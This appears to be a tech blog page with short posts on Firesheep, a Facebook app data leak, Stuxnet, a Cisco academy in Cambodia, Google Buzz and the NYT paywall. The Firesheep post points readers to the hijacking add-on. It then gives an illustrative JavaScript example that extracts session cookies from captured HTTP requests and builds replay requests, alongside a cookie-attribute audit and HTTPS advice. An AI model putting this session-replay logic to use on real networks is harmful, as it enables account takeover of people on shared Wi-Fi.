Eric Butler’s new ‘hack Facebook’ plugin for Firefox

Oh the mischief this new Firefox plugin is going to cause.

Firesheep adds a sidebar to Mozilla’s Firefox browser that lists anyone on the same open network, such as a coffee shop’s Wi-Fi, who is logged in to a site that sends its session cookie over unencrypted HTTP. The add-on captures that cookie off the air and can reuse it. “Double-click on someone [in the sidebar] and you’re instantly logged on as them,” said [plugin author Eric] Butler in his short description of his add-on.

Computerworld says the Firesheep add-on has been downloaded more than 50,000 times since it was released Sunday. You can download Firesheep from Butler’s Web site. It’s extremely easy to install: just download the .xpi file, drag it to a Firefox window, and restart.

And it’s not just Facebook that Butler’s plugin makes double-click hackable, either. Others include:

  • Amazon.com
  • Basecamp
  • bit.ly
  • CNET
  • Dropbox
  • Facebook
  • Flickr
  • Foursquare
  • Google
  • Gowalla
  • Windows Live
  • Tumblr
  • Twitter
  • WordPress
  • Yahoo
  • Yelp
  • and others

The plugin is relatively easy to customize, too. Each supported site is described by a small handler that names the site’s domain and the cookies that carry its login session, so someone with not much more than basic programming skills could add other domains to Firesheep’s default list. TechCrunch offers a pretty thorough explanation of how Firesheep works and the plugin’s impact, as well as a possible defense. The truth is, though, that using the Internet on a public Wi-Fi network is inherently insecure: anything sent unencrypted can be read by anyone else on the network. The fix on the site side is to serve the whole logged-in session over HTTPS and mark session cookies Secure so the browser never sends them in the clear; on the user side, a VPN or SSH tunnel hides the traffic from the local network. But that isn’t news, is it?
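To make the mechanism concrete, here is an added example (not Firesheep’s own code, and not Butler’s handler list) of what a sidejacking tool does with a plaintext HTTP request it sniffs off a shared network, alongside the server-side cookie check that defeats it. The site names, cookie names and the captured request are all constructed for illustration; the handler shape is a model of the idea, not the plugin’s real format.

```javascript
'use strict';

// Hypothetical per-site handlers (constructed, not Firesheep's list). A tool of
// this kind keeps one entry per site naming the cookies that carry the login.
const SITE_HANDLERS = [
  { name: 'example-social', domains: ['social.example'], sessionCookieNames: ['sid', 'uid'] },
  { name: 'example-mail',   domains: ['mail.example'],   sessionCookieNames: ['auth'] },
];

// Parse a raw HTTP/1.1 request exactly as it appears on the wire (CRLF-delimited).
function parseHttpRequest(raw) {
  const [head] = raw.split('\r\n\r\n');
  const lines = head.split('\r\n');
  const [method, path, version] = lines[0].split(' ');
  const headers = {};
  for (const line of lines.slice(1)) {
    const idx = line.indexOf(':');
    if (idx === -1) continue;
    headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  return { method, path, version, headers };
}

// Split a Cookie header into name/value pairs.
function parseCookies(header) {
  const cookies = {};
  if (!header) return cookies;
  for (const part of header.split(';')) {
    const idx = part.indexOf('=');
    if (idx === -1) continue;
    cookies[part.slice(0, idx).trim()] = part.slice(idx + 1).trim();
  }
  return cookies;
}

// Match a captured request against the handler list. Returns the site and its
// session cookies, or null when the host is unknown or any session cookie is
// missing (for instance, the user is browsing the site logged out).
function extractSession(raw) {
  const req = parseHttpRequest(raw);
  const host = (req.headers.host || '').toLowerCase();
  const handler = SITE_HANDLERS.find(h =>
    h.domains.some(d => host === d || host.endsWith('.' + d)));
  if (!handler) return null;
  const cookies = parseCookies(req.headers.cookie);
  const session = {};
  for (const name of handler.sessionCookieNames) {
    if (!(name in cookies)) return null;
    session[name] = cookies[name];
  }
  return { site: handler.name, host, cookies: session };
}

// "Double-click and you're logged in": build a fresh request that replays the
// captured session cookies. The server cannot tell this from the victim's browser.
function buildReplayRequest(session, path) {
  const cookie = Object.entries(session.cookies).map(([k, v]) => `${k}=${v}`).join('; ');
  return `GET ${path} HTTP/1.1\r\nHost: ${session.host}\r\nCookie: ${cookie}\r\n\r\n`;
}

// Server-side check: a session cookie without the Secure attribute is sent over
// plain HTTP and can be captured as above; HttpOnly keeps it away from scripts.
// Returns the attributes a Set-Cookie header is missing.
function auditSetCookie(setCookieHeader) {
  const attrs = setCookieHeader.split(';').slice(1).map(a => a.trim().toLowerCase());
  const missing = [];
  if (!attrs.includes('secure')) missing.push('Secure');
  if (!attrs.includes('httponly')) missing.push('HttpOnly');
  return missing;
}

// Constructed capture: what a sniffer on open Wi-Fi sees when a logged-in user
// loads a page over plain HTTP. The cookie values are made up.
const CAPTURED_REQUEST =
  'GET /home HTTP/1.1\r\n' +
  'Host: social.example\r\n' +
  'User-Agent: Mozilla/5.0\r\n' +
  'Cookie: sid=8f3a1c9e; uid=1042; theme=dark\r\n' +
  '\r\n';

const session = extractSession(CAPTURED_REQUEST);
console.log(session);                                                   // site, host and the two session cookies
console.log(buildReplayRequest(session, '/home'));                      // the hijacked request
console.log(auditSetCookie('sid=8f3a1c9e; Path=/'));                    // [ 'Secure', 'HttpOnly' ]
console.log(auditSetCookie('sid=8f3a1c9e; Path=/; Secure; HttpOnly'));  // []
```

The `theme` cookie is deliberately ignored: the tool only needs the cookies that the site treats as proof of login, which is why a handler is little more than a domain and a list of cookie names. Note that `auditSetCookie` only helps if the site also serves the whole logged-in session over HTTPS; a Secure cookie is never sent to an http:// URL at all, so a site that still links to plain-HTTP pages would simply log the user out there.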

More privacy troubles for Facebook

Facebook — for reasons of apathy, negligence or worse — still cannot secure the private details of its users.

Many of the most popular applications, or “apps,” on the social-networking site Facebook Inc. have been transmitting identifying information—in effect, providing access to people’s names and, in some cases, their friends’ names—to dozens of advertising and Internet tracking companies, a Wall Street Journal investigation has found.

The issue affects tens of millions of Facebook app users, including people who set their profiles to Facebook’s strictest privacy settings. The practice breaks Facebook’s rules, and renews questions about its ability to keep identifiable information about its users’ activities secure.

This is unlikely to be the last time that the personal details of Facebook users get exploited for company benefit. Since its earliest beginnings, Facebook has gobsmacked many with its profoundly cynical privacy policies. At first, people were outraged. Then they were just angry. Now the site is so large and so popular, and it has been pimping its users’ data for so long, that news of more blatant privacy violations elicits hardly more than a sigh.

I guess Zuckerberg was right after all.

Weaponized software

Iran is fighting off a significant cyber attack, reports The New York Times. The worm, dubbed Stuxnet, represents a hellish breakthrough in the evolution of computer viruses.

Stuxnet, which was first publicly identified several months ago, spreads between Windows PCs like an ordinary worm, but its payload is aimed solely at Siemens industrial control equipment of the kind that runs oil pipelines, electric utilities, nuclear facilities and other large industrial sites. While it is not clear that Iran was the main target (the infection has also been reported in Indonesia, Pakistan, India and elsewhere), a disproportionate number of computers inside Iran appear to have been struck, according to reports by computer security monitors.

Stuxnet was first publicly identified in June. The primary source of The Christian Science Monitor’s reporting on it was computer security expert Ralph Langner, who has been chronicling his research of the worm on his Web site. Langner called Stuxnet the “hack of the century,” and said “Stuxnet is going to be the best studied piece of malware in history.”

Wired magazine, unsurprisingly, has the definitive story.

“It’s the most complex piece of malware we’ve seen in the last five years or more,” says Nicolas Falliere, a code analyst at security firm Symantec. “It’s the first known time that malware is not targeting credit card [data], is not trying to steal personal user data, but is attacking real-world processing systems. That’s why it’s unique and is not over-hyped.”

… Eric Byres, chief technology officer for Byres Security, says the malware isn’t content to just inject a few commands into the PLC [Programmable Logic Controller] but does “massive reworking” of it.

“They’re massively trying to do something different than the processor was designed to do,” says Byres, who has extensive experience maintaining and troubleshooting Siemens control systems. “Every function block takes a fair amount of work to write, and they’re trying to do something quite radically different. And they’re not doing it in a light way. Whoever wrote this was really trying to mess with that PLC. We’re talking man-months, if not years, of coding to make it work the way it did.”

Cisco goes to Battambang

More evidence that Cambodia is on the fast track to the 21st century:

Cisco today announced the launch of a Cisco® Networking Academy® at the University of Management and Economics, expanding the program further into Cambodia. UME will integrate the IT Essentials course into the core curriculum for students at the provincial campus in Battambang.

Not Phnom Penh. Battambang!

Google’s new Facebook killer

In a direct assault on Facebook, Google has entered the social-networking wars with Google Buzz, a Gmail-integrated social-networking application. According to Google’s Todd Jackson, Buzz’s product manager, Buzz’s main features include:

  1. Auto-following
  2. Rich, fast sharing experience
  3. Public and private sharing
  4. Inbox integration
  5. Just the good stuff

According to a press release from Google:

The most noticeable advantage to Google Buzz is the way that e-mail comments and media, such as photos and videos, can be shared. Google Buzz automatically ‘follows’ the people who you communicate with most. Rather than broadcasting a passive “status message” like Facebook or “tweet” like Twitter, Google Buzz engages your friends by making the content that you find interesting available to them.

Most of the buzz about Buzz centers around its real-time commenting features and its mobile integration, including voice recognition, which allows users to comment with voice only. No keyboard required! For developers, Google provides a Buzz API.

Not everyone, however, is enamored. And privacy issues have already been raised.

The Official Google blog has all the details.

The NYT paywall will return

New York Magazine blogger Gabriel Sherman says the return of the New York Times paywall is imminent.

After a year of often tumultuous debate, The Gray Lady appears settled on a metered system similar to the one used by The Financial Times. Readers are allotted a certain number of free stories per month, and beyond that they must subscribe.

The Times toyed with a similar pay-per-view scheme a few years ago. In 2005, the paper launched TimesSelect, which made opinion pieces and other editorial content available only by subscription. The Times discontinued TimesSelect in 2007. At the time, the paper admitted that making content free and deriving revenue from advertising was financially smarter than the subscription-based model. That is apparently no longer the case.

Closer to home, DAP News is free. The Phnom Penh Post charges for content more than 90 days old. And The Cambodia Daily makes available only a very small selection of stories.